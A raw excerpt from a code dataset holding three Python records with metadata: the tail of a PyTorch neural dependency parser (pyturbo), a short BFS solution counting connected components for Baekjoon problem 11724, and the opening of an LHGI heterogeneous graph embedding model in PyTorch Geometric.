matrix(indices)\n embedding_sum = embedding_sum + embeddings\n\n return embedding_sum\n\n shape = (len(instances), max_length)\n index_matrix = torch.zeros(shape, dtype=torch.long)\n for i, instance in enumerate(instances):\n if type_ == 'fixedword':\n indices = instance.get_all_embedding_ids()\n elif type_ == 'trainableword':\n indices = instance.get_all_forms()\n elif type_ == 'lemma':\n indices = instance.get_all_lemmas()\n elif type_ == 'upos':\n indices = instance.get_all_upos()\n elif type_ == 'xpos':\n indices = instance.get_all_xpos()\n else:\n raise ValueError('Invalid embedding type: %s' % type_)\n\n index_matrix[i, :len(instance)] = torch.tensor(indices)\n\n if type_ == 'fixedword':\n embedding_matrix = self.fixed_word_embeddings\n elif type_ == 'trainableword':\n embedding_matrix = self.trainable_word_embeddings\n elif type_ == 'lemma':\n embedding_matrix = self.lemma_embeddings\n else:\n if type_ == 'upos':\n embedding_matrix = self.upos_embeddings\n else:\n embedding_matrix = self.xpos_embeddings\n\n if self.on_gpu:\n index_matrix = index_matrix.cuda()\n\n embeddings = embedding_matrix(index_matrix)\n return embeddings\n\n def _convert_arc_scores_to_parts(self, instances, parts):\n \"\"\"\n Convert the stored matrices with arc scores and label scores to 1d\n arrays, in the same order as in parts. 
Masks are also applied.\n\n :param instances: list of DependencyInstanceNumeric\n :param parts: a DependencyParts object\n \"\"\"\n new_head_scores = []\n new_label_scores = []\n\n # arc_mask has shape (head, modifier) but scores are\n # (modifier, head); so we transpose\n all_head_scores = torch.transpose(self.scores[Target.HEADS], 1, 2)\n all_label_scores = torch.transpose(self.scores[Target.RELATIONS], 1, 2)\n\n for i, instance in enumerate(instances):\n inst_parts = parts[i]\n mask = inst_parts.arc_mask\n mask = torch.tensor(mask.astype(np.bool))\n length = len(instance)\n\n # get a matrix [inst_length, inst_length - 1]\n # (root has already been discarded as a modifier)\n head_scores = all_head_scores[i, :length, :length - 1]\n\n # get a tensor [inst_length, inst_length - 1, num_labels]\n label_scores = all_label_scores[i, :length, :length - 1]\n\n mask = mask[:, 1:]\n head_scores1d = head_scores[mask]\n label_scores1d = label_scores[mask].view(-1)\n\n if self.training:\n # apply the margin on the scores of gold parts\n gold_arc_parts = torch.tensor(\n inst_parts.gold_parts[:inst_parts.num_arcs],\n device=head_scores.device)\n\n offset = inst_parts.offsets[Target.RELATIONS]\n num_labeled = inst_parts.num_labeled_arcs\n gold_label_parts = torch.tensor(\n inst_parts.gold_parts[offset:offset + num_labeled],\n device=head_scores.device)\n head_scores1d = head_scores1d - gold_arc_parts\n label_scores1d = label_scores1d - gold_label_parts\n\n new_head_scores.append(head_scores1d)\n new_label_scores.append(label_scores1d)\n\n self.scores[Target.HEADS] = new_head_scores\n self.scores[Target.RELATIONS] = new_label_scores\n\n def forward(self, instances, parts, normalization=ParsingObjective.LOCAL):\n \"\"\"\n :param instances: a list of DependencyInstance objects\n :param parts: a list of DependencyParts objects\n :param normalization: a ParsingObjective value indicating \"local\",\n \"global-margin\" or \"global-prob\". It only affects\n first order parts (arcs and labeled arcs).\n\n If \"local\", the losses for each word (as a modifier) is computed\n independently. 
The model will store a tensor with all arc scores\n (including padding) for efficient loss computation.\n\n If \"global-margin\", the loss is a hinge margin over the global\n structure.\n\n If \"global-prob\", the loss is the cross-entropy of the probability\n of the global structure.\n\n In the two latter cases, the model stores scores as a list of 1d\n arrays (without padding) that can easily be used with AD3 decoding\n functions.\n\n :return: a dictionary mapping each target to score tensors\n \"\"\"\n self.scores = {}\n for type_ in parts[0].part_lists:\n self.scores[type_] = []\n\n batch_size = len(instances)\n lengths = torch.tensor([len(instance) for instance in instances],\n dtype=torch.long)\n if self.on_gpu:\n lengths = lengths.cuda()\n\n # packed sequences must be sorted by decreasing length\n sorted_lengths, inds = lengths.sort(descending=True)\n\n # rev_inds are used to unsort the sorted sentences back\n _, rev_inds = inds.sort()\n if self.on_gpu:\n sorted_lengths = sorted_lengths.cuda()\n\n max_length = sorted_lengths[0].item()\n\n # compute char inds only once\n if self.char_rnn or self.predict_lemma:\n char_indices, token_lengths = create_char_indices(\n instances, max_length)\n char_indices = char_indices.to(lengths.device)\n token_lengths = token_lengths.to(lengths.device)\n else:\n char_indices, token_lengths = None, None\n\n embeddings = self.get_word_representations(\n instances, max_length, char_indices, token_lengths)\n\n if self.shared_rnn is not None:\n packed_embeddings = rnn_utils.pack_padded_sequence(\n embeddings, lengths, batch_first=True, enforce_sorted=False)\n\n # get hidden states for all words, ignore final cell\n packed_states, _ = self.shared_rnn(packed_embeddings)\n\n # ignore lengths -- we already know them!\n hidden_states, _ = rnn_utils.pad_packed_sequence(\n packed_states, batch_first=True)\n else:\n hidden_states = embeddings\n\n if self.predict_tags or self.predict_lemma:\n if self.tagger_rnn is None:\n # ignore root\n tagger_states = hidden_states[:, 1:]\n else:\n dropped = self.dropout(hidden_states)\n packed_states = rnn_utils.pack_padded_sequence(\n dropped, lengths, batch_first=True, enforce_sorted=False)\n tagger_packed_states, _ = self.tagger_rnn(packed_states)\n tagger_states, _ = rnn_utils.pad_packed_sequence(\n tagger_packed_states, batch_first=True)\n tagger_states = tagger_states[:, 1:]\n\n if self.predict_upos:\n if self.tag_mlp_size > 0:\n scorer_states = self.upos_mlp(tagger_states)\n else:\n scorer_states = tagger_states\n self.scores[Target.UPOS] = self.upos_scorer(scorer_states)\n\n if self.predict_xpos:\n if self.tag_mlp_size > 0:\n scorer_states = self.xpos_mlp(tagger_states)\n else:\n scorer_states = tagger_states\n self.scores[Target.XPOS] = self.xpos_scorer(scorer_states)\n\n if self.predict_morph:\n if self.tag_mlp_size > 0:\n scorer_states = self.morph_mlp(tagger_states)\n else:\n scorer_states = tagger_states\n self.scores[Target.MORPH] = self.morph_scorer(scorer_states)\n\n if self.predict_lemma:\n if self.training:\n lemmas, lemma_lengths = get_padded_lemma_indices(\n instances, max_length)\n lemmas = lemmas.to(lengths.device)\n lemma_lengths = lemma_lengths.to(lengths.device)\n else:\n lemmas, lemma_lengths = None, None\n\n # skip root\n logits = self.lemmatizer(\n char_indices[:, 1:], tagger_states,\n token_lengths[:, 1:], lemmas, lemma_lengths)\n self.scores[Target.LEMMA] = logits\n\n if self.predict_tree:\n if self.parser_rnn is None:\n parser_states = hidden_states\n else:\n dropped = self.dropout(hidden_states)\n 
packed_states = rnn_utils.pack_padded_sequence(\n dropped, lengths, batch_first=True, enforce_sorted=False)\n\n parser_packed_states, _ = self.parser_rnn(packed_states)\n parser_states, _ = rnn_utils.pad_packed_sequence(\n parser_packed_states, batch_first=True)\n\n self._compute_arc_scores(\n parser_states, lengths, normalization)\n\n # now go through each batch item\n for i in range(batch_size):\n length = lengths[i].item()\n states = parser_states[i, :length]\n sent_parts = parts[i]\n\n if self.model_type.consecutive_siblings:\n self._compute_consecutive_sibling_scores(states, sent_parts)\n\n if self.model_type.grandparents:\n self._compute_grandparent_scores(states, sent_parts)\n\n if self.model_type.grandsiblings:\n self._compute_grandsibling_scores(states, sent_parts)\n\n if normalization == ParsingObjective.GLOBAL_MARGIN:\n self._convert_arc_scores_to_parts(instances, parts)\n\n return self.scores\n", "repo_name": "deep-spin/pyturbo", "sub_path": "turboparser/parser/dependency_neural_model.py", "file_name": "dependency_neural_model.py", "file_ext": "py", "file_size_in_byte": 58292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.distributions.gumbel.Gumbel", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 101, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 282, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 282, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 330, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 330, "usage_type": "attribute"}, {"api_name": "token_dictionary.get_embedding_id", "line_number": 341, "usage_type": "call"}, {"api_name": "token_dictionary.UNKNOWN", "line_number": 341, "usage_type": "argument"}, {"api_name": "token_dictionary.get_form_id", "line_number": 342, "usage_type": "call"}, {"api_name": "token_dictionary.UNKNOWN", "line_number": 342, "usage_type": "argument"}, {"api_name": "token_dictionary.get_upos_id", "line_number": 343, "usage_type": "call"}, {"api_name": "token_dictionary.UNKNOWN", "line_number": 343, "usage_type": "argument"}, {"api_name": "token_dictionary.get_xpos_id", "line_number": 344, "usage_type": "call"}, {"api_name": 
"token_dictionary.UNKNOWN", "line_number": 344, "usage_type": "argument"}, {"api_name": "token_dictionary.get_lemma_id", "line_number": 345, "usage_type": "call"}, {"api_name": "token_dictionary.UNKNOWN", "line_number": 345, "usage_type": "argument"}, {"api_name": "token_dictionary.morph_tag_alphabets", "line_number": 346, "usage_type": "attribute"}, {"api_name": "token_dictionary.UNKNOWN", "line_number": 350, "usage_type": "argument"}, {"api_name": "token_dictionary.get_num_forms", "line_number": 355, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 356, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 356, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_lemmas", "line_number": 363, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 364, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 364, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_upos_tags", "line_number": 373, "usage_type": "call"}, {"api_name": "constants.SPECIAL_SYMBOLS", "line_number": 374, "usage_type": "argument"}, {"api_name": "torch.nn.Embedding", "line_number": 375, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 375, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_xpos_tags", "line_number": 381, "usage_type": "call"}, {"api_name": "token_dictionary.get_xpos_tags", "line_number": 382, "usage_type": "call"}, {"api_name": "token_dictionary.get_upos_tags", "line_number": 383, "usage_type": "call"}, {"api_name": "constants.SPECIAL_SYMBOLS", "line_number": 384, "usage_type": "argument"}, {"api_name": "torch.nn.Embedding", "line_number": 386, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 386, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 395, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 395, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 398, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 398, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_characters", "line_number": 406, "usage_type": "call"}, {"api_name": "layers.lstm.CharLSTM", "line_number": 408, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 413, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 413, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 424, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 425, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding.from_pretrained", "line_number": 426, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 426, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 426, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 429, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 429, "usage_type": "name"}, {"api_name": "transformers.BertConfig", "line_number": 437, "usage_type": "argument"}, {"api_name": "transformers.BertModel", "line_number": 438, "usage_type": "call"}, {"api_name": "transformers.BertModel.from_pretrained", "line_number": 441, "usage_type": "call"}, {"api_name": "transformers.BertModel", "line_number": 441, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 445, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 445, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 446, "usage_type": "call"}, {"api_name": 
"torch.nn.Dropout", "line_number": 447, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 447, "usage_type": "name"}, {"api_name": "layers.lstm.HighwayLSTM", "line_number": 451, "usage_type": "call"}, {"api_name": "layers.lstm.LSTM", "line_number": 462, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 475, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 475, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_upos_tags", "line_number": 476, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 483, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 483, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_xpos_tags", "line_number": 484, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 491, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 491, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_morph_singletons", "line_number": 492, "usage_type": "call"}, {"api_name": "layers.lstm.LSTM", "line_number": 502, "usage_type": "call"}, {"api_name": "token_dictionary.get_num_deprels", "line_number": 510, "usage_type": "call"}, {"api_name": "layers.biaffine.DeepBiaffineScorer", "line_number": 511, "usage_type": "call"}, {"api_name": "layers.biaffine.DeepBiaffineScorer", "line_number": 513, "usage_type": "call"}, {"api_name": "layers.biaffine.DeepBiaffineScorer", "line_number": 516, "usage_type": "call"}, {"api_name": "layers.biaffine.DeepBiaffineScorer", "line_number": 518, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 572, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 572, "usage_type": "call"}, {"api_name": "torch.full", "line_number": 574, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 578, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 578, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 593, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 593, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 594, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 594, "usage_type": "name"}, {"api_name": "layers.lstm", "line_number": 622, "usage_type": "name"}, {"api_name": "layers.lstm.append", "line_number": 625, "usage_type": "call"}, {"api_name": "layers.lstm", "line_number": 625, "usage_type": "name"}, {"api_name": "torch.relu", "line_number": 625, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 627, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 627, "usage_type": "name"}, {"api_name": "layers.lstm.extend", "line_number": 628, "usage_type": "call"}, {"api_name": "layers.lstm", "line_number": 628, "usage_type": "name"}, {"api_name": "layers.lstm.append", "line_number": 632, "usage_type": "call"}, {"api_name": "layers.lstm", "line_number": 632, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 634, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 634, "usage_type": "name"}, {"api_name": "layers.lstm", "line_number": 634, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 638, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 686, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 687, "usage_type": "attribute"}, {"api_name": "transformers.BertConfig.from_dict", "line_number": 694, "usage_type": "call"}, {"api_name": "transformers.BertConfig", "line_number": 694, "usage_type": "name"}, {"api_name": 
"torch.load", "line_number": 717, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 719, "usage_type": "call"}, {"api_name": "constants.ParsingObjective.LOCAL", "line_number": 753, "usage_type": "attribute"}, {"api_name": "constants.ParsingObjective", "line_number": 753, "usage_type": "name"}, {"api_name": "torch.eye", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 758, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 766, "usage_type": "attribute"}, {"api_name": "constants.ParsingObjective.GLOBAL_MARGIN", "line_number": 768, "usage_type": "attribute"}, {"api_name": "constants.ParsingObjective", "line_number": 768, "usage_type": "name"}, {"api_name": "torch.arange", "line_number": 774, "usage_type": "call"}, {"api_name": "torch.nn.functional.logsigmoid", "line_number": 780, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 780, "usage_type": "name"}, {"api_name": "torch.sign", "line_number": 781, "usage_type": "call"}, {"api_name": "torch.nn.functional.softplus", "line_number": 787, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 787, "usage_type": "name"}, {"api_name": "torch.abs", "line_number": 788, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 791, "usage_type": "call"}, {"api_name": "constants.Target.HEADS", "line_number": 800, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 800, "usage_type": "name"}, {"api_name": "constants.Target.RELATIONS", "line_number": 801, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 801, "usage_type": "name"}, {"api_name": "constants.Target.SIGN", "line_number": 802, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 802, "usage_type": "name"}, {"api_name": "constants.Target.DISTANCE", "line_number": 803, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 803, "usage_type": "name"}, {"api_name": "constants.Target.GRANDPARENTS", "line_number": 815, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 815, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 816, "usage_type": "call"}, {"api_name": "constants.Target.GRANDPARENTS", "line_number": 817, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 817, "usage_type": "name"}, {"api_name": "constants.Target.GRANDPARENTS", "line_number": 828, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 828, "usage_type": "name"}, {"api_name": "torch.tanh", "line_number": 840, "usage_type": "call"}, {"api_name": "torch.tanh", "line_number": 841, "usage_type": "call"}, {"api_name": "torch.tanh", "line_number": 842, "usage_type": "call"}, {"api_name": "constants.Target.GRANDPARENTS", "line_number": 846, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 846, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 859, "usage_type": "call"}, {"api_name": "constants.Target.NEXT_SIBLINGS", "line_number": 870, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 870, "usage_type": "name"}, {"api_name": "torch.tanh", "line_number": 888, "usage_type": "call"}, {"api_name": "torch.tanh", "line_number": 889, "usage_type": "call"}, {"api_name": "torch.tanh", "line_number": 890, "usage_type": "call"}, {"api_name": "constants.Target.NEXT_SIBLINGS", "line_number": 895, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 895, 
"usage_type": "name"}, {"api_name": "torch.cat", "line_number": 908, "usage_type": "call"}, {"api_name": "constants.Target.GRANDSIBLINGS", "line_number": 921, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 921, "usage_type": "name"}, {"api_name": "torch.tanh", "line_number": 939, "usage_type": "call"}, {"api_name": "torch.tanh", "line_number": 940, "usage_type": "call"}, {"api_name": "torch.tanh", "line_number": 941, "usage_type": "call"}, {"api_name": "constants.Target.GRANDSIBLINGS", "line_number": 946, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 946, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 956, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 957, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 961, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 961, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 967, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 968, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 971, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 976, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 979, "usage_type": "call"}, {"api_name": "torch.split", "line_number": 990, "usage_type": "call"}, {"api_name": "torch.split", "line_number": 991, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 996, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 997, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 1002, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 1015, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 1021, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 1025, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 1086, "usage_type": "call"}, {"api_name": "torch.rand_like", "line_number": 1091, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 1115, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 1116, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 1121, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 1134, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 1134, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 1149, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 1182, "usage_type": "call"}, {"api_name": "constants.Target.HEADS", "line_number": 1182, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1182, "usage_type": "name"}, {"api_name": "torch.transpose", "line_number": 1183, "usage_type": "call"}, {"api_name": "constants.Target.RELATIONS", "line_number": 1183, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1183, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 1188, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 1188, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 1204, "usage_type": "call"}, {"api_name": "constants.Target.RELATIONS", "line_number": 1208, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1208, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 1210, "usage_type": "call"}, {"api_name": "constants.Target.HEADS", "line_number": 1219, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1219, 
"usage_type": "name"}, {"api_name": "constants.Target.RELATIONS", "line_number": 1220, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1220, "usage_type": "name"}, {"api_name": "constants.ParsingObjective.LOCAL", "line_number": 1222, "usage_type": "attribute"}, {"api_name": "constants.ParsingObjective", "line_number": 1222, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 1251, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 1252, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.rnn.pack_padded_sequence", "line_number": 1279, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 1279, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pad_packed_sequence", "line_number": 1286, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 1286, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pack_padded_sequence", "line_number": 1297, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 1297, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pad_packed_sequence", "line_number": 1300, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 1300, "usage_type": "name"}, {"api_name": "constants.Target.UPOS", "line_number": 1309, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1309, "usage_type": "name"}, {"api_name": "constants.Target.XPOS", "line_number": 1316, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1316, "usage_type": "name"}, {"api_name": "constants.Target.MORPH", "line_number": 1323, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1323, "usage_type": "name"}, {"api_name": "constants.Target.LEMMA", "line_number": 1338, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1338, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pack_padded_sequence", "line_number": 1345, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 1345, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pad_packed_sequence", "line_number": 1349, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 1349, "usage_type": "name"}, {"api_name": "constants.ParsingObjective.GLOBAL_MARGIN", "line_number": 1370, "usage_type": "attribute"}, {"api_name": "constants.ParsingObjective", "line_number": 1370, "usage_type": "name"}]} +{"seq_id": "71888576489", "text": "# 백준 11724 연결 요소의 개수\n\nfrom collections import defaultdict, deque\n\nn,m = map(int,input().split())\nv = [0]*(n+1)\ntree = defaultdict(list)\n\nfor _ in range(m):\n s,e = map(int,input().split())\n tree[s].append(e)\n tree[e].append(s)\n\nanswer = 0\nfor i in range(1,n+1):\n if not v[i]:\n q = deque()\n q.append(i)\n v[i] = 1\n answer += 1\n while q:\n idx = q.popleft()\n for next_idx in tree[idx]:\n if not v[next_idx]:\n v[next_idx] = 1\n q.append(next_idx)\n\nprint(answer)", "repo_name": "do0134/solostudy", "sub_path": "algorithm/9월/0902/1sol.py", "file_name": "1sol.py", "file_ext": "py", "file_size_in_byte": 594, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 7, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "34835985482", "text": "import torch\r\nfrom torch_geometric.nn import GCNConv\r\nfrom torch_geometric.nn import ChebConv\r\nfrom torch_geometric.nn import 
SAGEConv\r\nfrom torch_geometric.nn import Linear\r\nfrom layers import Discriminator\r\nfrom layers import AvgReadout\r\nfrom layers import SemanticAttentionLayer\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\n\r\nclass LHGI(torch.nn.Module):\r\n def __init__(self,input_dim,att_dim,dropout_rate=0.):\r\n super(LHGI, self).__init__()\r\n #super parameters:\r\n self.dropout_rate = dropout_rate\r\n self.linear=Linear(-1,input_dim)\r\n\r\n self.semantic_level_attention=SemanticAttentionLayer(input_dim, att_dim)\r\n self.readout = AvgReadout()\r\n self.disc = Discriminator(input_dim)\r\n self.sig = torch.sigmoid\r\n\r\n self.conv_1 = GCNConv(input_dim, input_dim)\r\n self.conv_2 = GCNConv(input_dim, input_dim)\r\n\r\n\r\n def forward(self,graph,summary_vetor,nodeType,Batch_size):\r\n\r\n x_dict=graph.x_dict\r\n edge_index_dict=graph.edge_index_dict\r\n\r\n X_origin=x_dict[nodeType]\r\n\r\n idx = np.random.permutation(graph[nodeType].num_nodes)\r\n X_origin_shuffle = X_origin[idx, :]\r\n\r\n\r\n X_origin=self.linear(X_origin) #输入是one-hot时可以参考使用torch.nn.embedding(),减少模型输入规模\r\n X_origin=F.relu(X_origin)\r\n X_origin_shuffle=self.linear(X_origin_shuffle)\r\n X_origin_shuffle=F.relu(X_origin_shuffle)\r\n\r\n\r\n\r\n\r\n\r\n\r\n GNN_conv_list_1=[]\r\n GNN_conv_list_2=[]\r\n for edge in edge_index_dict.values():\r\n X = self.conv_1(X_origin, edge)\r\n X = F.relu(X)\r\n X = F.dropout(X, p=self.dropout_rate, training=self.training)\r\n\r\n X = self.conv_2(X, edge)\r\n X = F.relu(X)\r\n X = F.dropout(X, p=self.dropout_rate, training=self.training)\r\n\r\n\r\n X_shuffle = self.conv_1(X_origin_shuffle, edge)\r\n X_shuffle = F.relu(X_shuffle)\r\n X_shuffle = F.dropout(X_shuffle, p=self.dropout_rate, training=self.training)\r\n\r\n X_shuffle = self.conv_2(X_shuffle, edge)\r\n X_shuffle = F.relu(X_shuffle)\r\n X_shuffle = F.dropout(X_shuffle, p=self.dropout_rate, training=self.training)\r\n\r\n\r\n ###########\r\n GNN_conv_list_1.append(X)\r\n GNN_conv_list_2.append(X_shuffle)\r\n\r\n\r\n\r\n\r\n muilt_gcn_out=torch.cat(GNN_conv_list_1,dim=0)\r\n muilt_gcn_out_nagtive = torch.cat(GNN_conv_list_2,dim=0)\r\n\r\n\r\n Att_out = self.semantic_level_attention(muilt_gcn_out , len(edge_index_dict))\r\n Att_out_nagtive = self.semantic_level_attention(muilt_gcn_out_nagtive, len(edge_index_dict))\r\n\r\n\r\n Att_out=Att_out[:Batch_size]\r\n Att_out_nagtive=Att_out_nagtive[:Batch_size]\r\n\r\n summary_vetor_in_model = self.readout(Att_out, None)\r\n\r\n summary_vetor = torch.stack((summary_vetor, summary_vetor_in_model), dim=0)\r\n summary_vetor = torch.mean(summary_vetor,dim=0)\r\n #summary_vetor = self.sig(summary_vetor)\r\n\r\n samp_bias1 = None\r\n samp_bias2 = None\r\n\r\n ret = self.disc(summary_vetor, Att_out, Att_out_nagtive, samp_bias1, samp_bias2)\r\n return ret, summary_vetor\r\n\r\n\r\n def get_embedding(self,graph,nodeType,target_id_set=None):\r\n\r\n x_dict = graph.x_dict\r\n edge_index_dict = graph.edge_index_dict\r\n\r\n X_origin = x_dict[nodeType]\r\n\r\n\r\n X_origin = self.linear(X_origin)\r\n X_origin = F.relu(X_origin)\r\n\r\n\r\n GNN_conv_list_1 = []\r\n for edge in edge_index_dict.values():\r\n X = self.conv_1(X_origin, edge)\r\n X = F.relu(X)\r\n X = F.dropout(X, p=self.dropout_rate, training=self.training)\r\n\r\n X = self.conv_2(X, edge)\r\n X = 